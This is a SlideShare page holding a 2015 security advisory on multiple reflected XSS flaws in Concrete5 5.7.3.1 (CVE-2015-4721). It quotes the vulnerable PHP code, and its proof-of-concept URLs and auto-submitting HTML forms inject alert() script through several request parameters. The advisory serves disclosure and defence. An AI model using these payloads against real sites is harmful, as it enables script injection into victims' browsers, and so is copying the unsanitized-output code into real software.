Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Concrete5 Multiple Reflected XSS Advisory

8,498 views

Published on

Concrete5 Multiple Reflected XSS Advisory

Published in: Software
  • Be the first to comment

  • Be the first to like this

Concrete5 Multiple Reflected XSS Advisory

  1. 1. Edition: 1.0 Last Edit: 24/06/2015 Cassification: Not restricted Multiple Reflected Cross Site Scripting Vulnerabilities in Concrete5 version 5.7.3.1 Author: Egidio Romano
  2. 2. Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 1/4  Summary Vulnerabilities Class Cross Site Scripting (XSS) CVE ID CVE-2015-4721 Remote Yes Local No Published June 6, 2015 Updated June 24, 2015 Credit Egidio Romano Vulnerable Version 5.7.3.1 and probably prior versions Fixed On 5.7.4 Other References https://hackerone.com/reports/59661 http://blog.mindedsecurity.com/2015/06/multiple- security-issues-discovered-in-concrete5-part1.html  Description Concrete5 is vulnerable to some reflected Cross Site Scripting (XSS) attacks because certain user input is being used within the output it generates without validating or encoding it.  Vulnerabilities Details Following are the reflected XSS vulnerabilities identified:  File: /concrete/views/panels/details/page/versions.php (lines 5-14): <?php foreach($_REQUEST['cvID'] as $cvID) { $tabs[] = array('view-version-' . $cvID, t('Version %s', $cvID), $checked); $checked = false; } print $ih->tabs($tabs); foreach($_REQUEST['cvID'] as $cvID) { ?>
  3. 3. Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 2/4 <div id="ccm-tab-content-view-version-<?php echo $cvID?>" style="display: <?php echo $display?>; height: 100%"> <iframe border="0" id="v<?php echo time()?>" frameborder="0" height="100%" width="100%" src="<?php echo REL_DIR_FILES_TOOLS_REQUIRED?>/pages/preview_version?cvID=<?php echo $cvID?>&amp;cID=<?php echo $_REQUEST['cID']?>" /> User input passed through the “cvID” and “cID” request parameters is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting malicious URLs like these: http://[host]/index.php/ccm/system/panels/details/page/versions?cID=1&cvID[]=%22%3E%3Cscri pt%3Ealert%28/XSS/%29%3C/script%3E%3C!-- http://[host]/index.php/ccm/system/panels/details/page/versions?cvID[]=1&cID=1%22%3E%3C/if rame%3E%3Cscript%3Ealert%28/XSS/%29%3C/script%3E  File: /concrete/src/Form/Service/Widget/UserSelector.php (lines 17-35): public function selectUser($fieldName, $uID = false, $javascriptFunc … $selectedUID = 0; if (isset($_REQUEST[$fieldName])) { $selectedUID = $_REQUEST[$fieldName]; } else if ($uID > 0) { $selectedUID = $uID; } $html = ''; $html .= '<div class="ccm-summary-selected-item"><div class="ccm-summary- selected-item-inner"><strong class="ccm-summary-selected-item-label">'; if ($selectedUID > 0) { $ui = UserInfo::getByID($selectedUID); $html .= $ui->getUserName(); } $html .= '</strong></div>'; $identifier = new ConcreteCoreUtilityServiceIdentifier(); $selector = $identifier->getString(32); $html .= '<a class="ccm-sitemap-select-item" data-form-user-selector="' . $selector . '" dialog-append-buttons="true" dialog-width="90%" dialog-height="70%" dialog- modal="false" dialog-title="' . t('Choose User') . '" href="' . URL::to('/ccm/system/dialogs/user/search') . '">' . t('Select User') . '</a>'; $html .= '<input type="hidden" data-form-user-selector-input="' . $selector . '" name="' . $fieldName . '" value="' . $selectedUID . '">';/> User input passed through the “uID” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this:
  4. 4. Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 3/4 http://[host]/index.php/ccm/system/panels/details/page/attributes?cID=1&uID=%22%3E%3Cscrip t%3Ealert%28/XSS/%29%3C/script%3E  File: /concrete/elements/group/search.php (lines 4-20): $searchRequest = $_REQUEST; $result = Loader::helper('json')->encode($controller->getSearchResultObject()- >getJSONObject()); $tree = GroupTree::get(); $guestGroupNode = GroupTreeNode::getTreeNodeByGroupID(GUEST_GROUP_ID); $registeredGroupNode = GroupTreeNode::getTreeNodeByGroupID(REGISTERED_GROUP_ID); ?> <style type="text/css"> div[data-search=groups] form.ccm-search-fields { margin-left: 0px !important; } </style> <div data-search="groups"> <script type="text/template" data-template="search-form"> <form role="form" data-search-form="groups" action="<?php echo URL::to('/ccm/system/search/groups/submit')?>" class="form-inline ccm-search-fields ccm- search-fields-none"> <input type="hidden" name="filter" value="<?php echo $searchRequest['filter']?>" /> User input passed through the “filter” request parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious URL like this: http://[host]/index.php/dashboard/users/groups?filter=%22%3E%3Cscript%3Ealert%28/XSS/%29%3 C/script%3E  URL: http://[host]/index.php/dashboard/system/multilingual/setup/load_icon User input passed through the “msCountry” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this: <html> <body> <form method="POST" action="http://[host]/index.php/dashboard/system/multilingual/setup/load_icon"> <input type="hidden" name="msCountry" value='"><script>alert(/XSS/)</script><!--'> </form>
  5. 5. Multiple Reflected XSS in Concrete5 version 5.7.3.1 Edition: v1.0 Date: 24/06/2015 Not restricted Page 4/4 <script>document.forms[0].submit()</script> </body> </html>  URL: http://[host]/index.php/dashboard/pages/single User input passed through the “pageURL” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser by tricking the victim user into visiting a malicious web page like this: <html> <body> <form method="POST" action="http://[host]/index.php/dashboard/pages/single"> <input type="hidden" name="pageURL" value='"><script>alert(/XSS/)</script>'> </form> <script>document.forms[0].submit()</script> </body> </html>  File: /concrete/attributes/select/form.php (lines 55-60): $vals = $this->post('atSelectNewOption'); if (is_array($vals)) { foreach($vals as $v) { ?> <div class="newAttrValue"> <?php echo $form->hidden($this- >field('atSelectNewOption') . '[]', $v)?> <span class="badge"><?php echo $v?></span> /> User input passed through the “atSelectNewOption” POST parameter is not properly sanitized before being used to generate HTML output. This can be exploited by an attacker to inject arbitrary script code into another user’s browser.

×